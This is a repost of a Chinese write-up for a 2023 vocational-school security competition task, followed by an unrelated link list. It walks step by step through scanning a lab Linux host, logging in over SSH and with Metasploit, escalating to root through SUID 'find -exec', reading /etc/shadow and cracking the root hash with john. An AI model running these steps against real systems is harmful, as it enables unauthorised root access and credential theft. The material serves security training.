当前位置: 首页 > news >正文

2023年中职“网络安全“—Linux系统渗透提权②

2023年中职"网络安全"—Linux系统渗透提权②

  • Linux操作系统渗透测试
    • 任务环境说明:
      • 1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;
      • 2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;
      • 3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;
      • 4. 使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;
      • 5. 使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;

Linux操作系统渗透测试

任务环境说明:

  • 服务器场景:Server2203(关闭链接)
  • 用户名:hacker 密码:123456

1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;

nmap -p- -sV 靶机IP        # -p- 全端口,-sV 版本探测


flag: 2232/tcp

2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;

ssh hacker@靶机IP -p 2232            # -p 指定端口,这里有点小坑,应该kali的ssh版本高,靶机的ssh版本低,导致的。

# 解法 1
ssh hacker@靶机IP -p 2232 -oKexAlgorithms=+diffie-hellman-group1-sha1        # -oKexAlgorithms=+diffie-hellman-group1-sha1 加上这个算,你可以点击下面的链接

legacy.html

# 解法 2 
msfconsole                    # 我只说你可能不懂得
search ssh_login
use 0
set RHOSTS 靶机IP
set username hacker
set password 123456
set RPORT 2232                # 注意一定要改端口,别忘记了
run
sessions -l                   # 列出会话
sessions 1                    # 连接第一个会话

uname -a        # 查看系统基本信息


flag: 1doLfH31

3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag提交;

uname -a        # 查看系统基本信息


flag: 2.6.18-8.el5

4. 使用渗透机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;

find / -perm -u=s -type f 2>/dev/null

touch 1                            # 创建个文件
ls                                 # ls 查看文件
/usr/bin/find 1 -exec id \;        # 提权 -exec 执行命令 \; 结束

/usr/bin/find 1 -exec ls /root \;
/usr/bin/find 1 -exec cat /root/key.txt \;


flag: 84pPxbiP

5. 使用渗透机对服务器管理员提权,并将服务器中root的密码作为flag提交;

/usr/bin/find 1 -exec cat /etc/shadow \;

vim hash            # 把root信息行写入进去
cat hash            # 查看是否写入成功
john hash           # 破解密码


flag: darkman

  1. 使用渗透机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。
su root                            # 切换root用户
id                                 # 查看id是否为root
cd                                 # 不加参数会直接回到当前用户的家目录
pwd                                # 查看当前所在目录路径
python -V                          # 查看当前python版本
python -m SimpleHTTPServer 8080    # 开启HTTP服务,端口8080

访问的时候一定要指定8080端口


flag: HVcKG7tf

http://www.lryc.cn/news/238286.html

相关文章:

  • 多模态大模型训练数据集汇总介绍
  • IDEA中更换java项目JDK
  • C++函数
  • 设计模式-命令模式-笔记
  • 酒店品牌纷纷冲击中高端,东呈集团能否“快人一步”?
  • [hive] posexplode函数
  • C#具名参数(Named Parameters)
  • Vue3的组件如何通讯
  • MySQL SUBSTRING_INDEX 函数用法
  • 腾讯微服务平台TSF学习笔记(一)--如何使用TSF的Sidecar过滤器实现mesh应用的故障注入
  • day30_servlet
  • 计算机毕业设计 基于SpringBoot的社区物资交易互助平台/系统的设计与实现 Java实战项目 附源码+文档+视频讲解
  • go 判断两棵树内容是否一致
  • 从Hugging Face上手动下载并加载预训练模型
  • Vue 前置 后置 路由守卫 独享 路由权限控制 自定义属性
  • upload-labs关卡11(双写后缀名绕过)通关思路
  • go语言学习之旅之Go语言基础语法二
  • 七天.NET 8操作SQLite入门到实战 - SQLite 简介
  • 问题 R: 胜利大逃亡(HUST)
  • 项目讲解:让你在IT行业面试中以开发、实施、产品更近一步
  • Windows 安装 Docker
  • AI绘画使用Stable Diffusion(SDXL)绘制三星堆风格的图片
  • Window下如何对Redis进行开启与关闭
  • C++ Qt 学习(十):Qt 其他技巧
  • 跳台阶游戏(Python排列组合函数itertools.combinations的应用)
  • 【Python百宝箱】Python测试工具大揭秘:从单元测试到Web自动化
  • 〖大前端 - 基础入门三大核心之JS篇㊵〗- DOM事件监听及onxxx的使用
  • 解锁潜力:创建支持Actions接口调用的高级GPTs
  • 【发明专利】天洑软件再度收获六项国家发明专利授权
  • Netty源码学习4——服务端是处理新连接的netty的reactor模式